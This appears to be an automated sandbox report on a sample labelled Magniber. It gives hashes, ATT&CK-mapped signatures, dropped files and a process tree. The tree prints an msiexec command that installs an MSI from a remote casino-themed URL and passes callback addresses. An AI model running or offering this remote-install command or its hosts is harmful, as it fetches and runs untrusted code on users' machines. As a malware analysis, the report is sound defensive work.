ecc8110ae10210a809e85df56977d026788b17fdb9f0b0e13adaa323d895b7ef

General

Target

2024-08-22_68d33983980ad464868c100f10ae2158_magniber.exe
Size

1.4MB
MD5

68d33983980ad464868c100f10ae2158
SHA1

6e653916c9ae0703a5d2c88a8131b49a74331dd1
SHA256

ecc8110ae10210a809e85df56977d026788b17fdb9f0b0e13adaa323d895b7ef
SHA512

836d4c3d1e1651d4877e49f88cc79d7388ef2d294eceaf6247b6d62442ae7904a9345da06ee4a1689dcc27765b387dd4541196e58a5a74ee2971371f1a830fc1
SSDEEP

24576:SaQbRAWf/KnKvX2okRZu2OmZvx43IgNrXXF2RHKTPohCksRyN5DqOJEtMT:SaiH/44X2okDOES4WSOP8cRy7MMT

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3184	~0ai2nu4rfj.tmp

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
3328	MSIEXEC.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-08-22_68d33983980ad464868c100f10ae2158_magniber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	~0ai2nu4rfj.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3328	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	3328	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3328	MSIEXEC.EXE
3328	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4928 wrote to memory of 3184	4928	2024-08-22_68d33983980ad464868c100f10ae2158_magniber.exe	84
PID 4928 wrote to memory of 3184	4928	2024-08-22_68d33983980ad464868c100f10ae2158_magniber.exe	84
PID 4928 wrote to memory of 3184	4928	2024-08-22_68d33983980ad464868c100f10ae2158_magniber.exe	84
PID 3184 wrote to memory of 3328	3184	~0ai2nu4rfj.tmp	92
PID 3184 wrote to memory of 3328	3184	~0ai2nu4rfj.tmp	92
PID 3184 wrote to memory of 3328	3184	~0ai2nu4rfj.tmp	92

C:\Users\Admin\AppData\Local\Temp\2024-08-22_68d33983980ad464868c100f10ae2158_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-22_68d33983980ad464868c100f10ae2158_magniber.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4928
- C:\Users\Admin\AppData\Local\Temp\~0ai2nu4rfj.tmp
  "C:\Users\Admin\AppData\Local\Temp\~0ai2nu4rfj.tmp"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3184
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://clatz.fileslldl.eu/client/pkgs/titaneurogerman/Casino Titan Euro German20150207102719.msi" DDC_DID=587315 DDC_RTGURL=http://www.filecdn.eu/dl/TrackSetup/TrackSetup.aspx?DID=587315%26filename=CasinoTitanGermanSetup%2Eexe%26CASINONAME=titaneurogerman DDC_DOWNLOAD_AFFID=64864 DDC_UPDATESTATUSURL=http://190.4.91.1:8080/titaneuro/Lobby.WebServices/Installer.asmx DDC_SIGNUPURL=http://190.4.91.1:8080/titaneuro/Lobby.WebSite/SignUpUnsecure.aspx CUSTOMNAME02=redirectAsData CUSTOMVALUE02=1 CUSTOMNAME03=remoteIP CUSTOMVALUE03=108.162.212.252 CUSTOMNAME04=name CUSTOMNAME05=email CUSTOMNAME06=redirect CUSTOMNAME07=version CUSTOMVALUE07=100 CUSTOMNAME08=camefrom CUSTOMVALUE08=http://www.77-free-slot-machine-games.com/ CUSTOMNAME09=adid CUSTOMVALUE09=NULL CUSTOMNAME10=affreferrer CUSTOMVALUE10=http://www.77-free-slot-machine-games.com/ SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~0ai2nu4rfj.tmp"
    3⤵
    - Use of msiexec (install) with remote resource
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:3328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_is93C9.tmp

Filesize
1KB

MD5
c68921fa9203d98b31970c1768a09c4b

SHA1
29a581e01f5bf2197a1ffae1e4a592ba586adccf

SHA256
b0b21da1e041450e0ee8b2f6fc0f57c83e08847d84a9316c7067918d365ed236

SHA512
6a32e024d11d32066626d9068692affb07b3e9c7d9cb9a3d7771ac1fb622e4bbfe2a69393afbf77779f12842d049dc7705c5d6ad18feafe7983e927d9c7ff4b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\{E84487ED-F05A-472C-A8B7-F4E824363DF1}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{E84487ED-F05A-472C-A8B7-F4E824363DF1}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~0ai2nu4rfj.tmp

Filesize
1.2MB

MD5
342841254eb5efed8143efc8753a1649

SHA1
b19cb0b492bdd736f76043256e1e5ce302b1e0c6

SHA256
674d263ff234bc6ecded51164df7e6fa750ac78539e71af5fbc675504aa9b7d5

SHA512
301f75e413d2267f2a53cd2fb5ffdaff1a8e0005b6d50154a14a2607d709d338af0f5370a7558e2e1f3c13764052d781dacf351fb9112464102b577c28717300

Download Submit
C:\Users\Admin\AppData\Local\Temp\~93C6.tmp

Filesize
6KB

MD5
d7fd7aa15ac4967d773a54e3001eed96

SHA1
0c301c0356be6adfca2eadf7ed8bf32f2bb00230

SHA256
0b16c37a60f3afd96a8bd7770add79fdc9a5f6afe4b3ba35b74f5df668a1cc43

SHA512
a99d357ab0035e1b7a19752304602e90f0557c0befe1f0559a79512c897accda5271695af9d728b87b310f8a923d7413d89493e17e11c4ccf2bde3932cd70eec

Download Submit

Analysis

Sharing